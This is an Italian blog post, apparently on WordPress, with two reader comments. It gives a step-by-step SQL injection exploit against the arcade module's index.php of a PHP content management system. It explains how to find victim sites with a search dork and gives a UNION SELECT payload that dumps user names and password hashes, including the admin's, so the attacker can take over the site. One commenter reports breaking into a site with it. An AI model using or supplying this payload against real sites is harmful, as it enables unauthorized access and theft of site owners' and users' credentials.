exploit in /arcade/index.php

Questo tipo di exploit e relativamente un gioco da ragazzi.
1.Il Bug si trova nell index.php.
2.Facciamo una ricerca con google DorK cioe http://www.blackwebsearch.com/index.html Al meno coi mi risulta a me..
3.Troviamo la vittima cercando con dork /infusions/arcade/
4.Aggiungiamo:

exploit:index.php?op=view_game_list&cid=-1/**/union/**

/select/**/null,user_name,user_password,

null,null,null/**/from/**/fusion_users/*

al nostro sito e vuala e fatta.
Davanti a voi tutte le hash delle password del sito compresa quella del admin
Troviamo la password e siamo Admin.

3 Risposte to “exploit in /arcade/index.php”

  1. 6 stato mlt chiaro ma a me purtroppo nn funziona…

  2. metalneox Says:

    Provato-entrato senza deface perche sono un ragazzo buono pero e un bug veramente pericoloso e ci sono un fottio di siti fatti in questo modo

Lascia un commento

Inserisci i tuoi dati qui sotto o clicca su un'icona per effettuare l'accesso:

Logo WordPress.com

Stai commentando usando il tuo account WordPress.com. Chiudi sessione / Modifica )

Foto Twitter

Stai commentando usando il tuo account Twitter. Chiudi sessione / Modifica )

Foto di Facebook

Stai commentando usando il tuo account Facebook. Chiudi sessione / Modifica )

Google+ photo

Stai commentando usando il tuo account Google+. Chiudi sessione / Modifica )

Connessione a %s...

%d blogger cliccano Mi Piace per questo: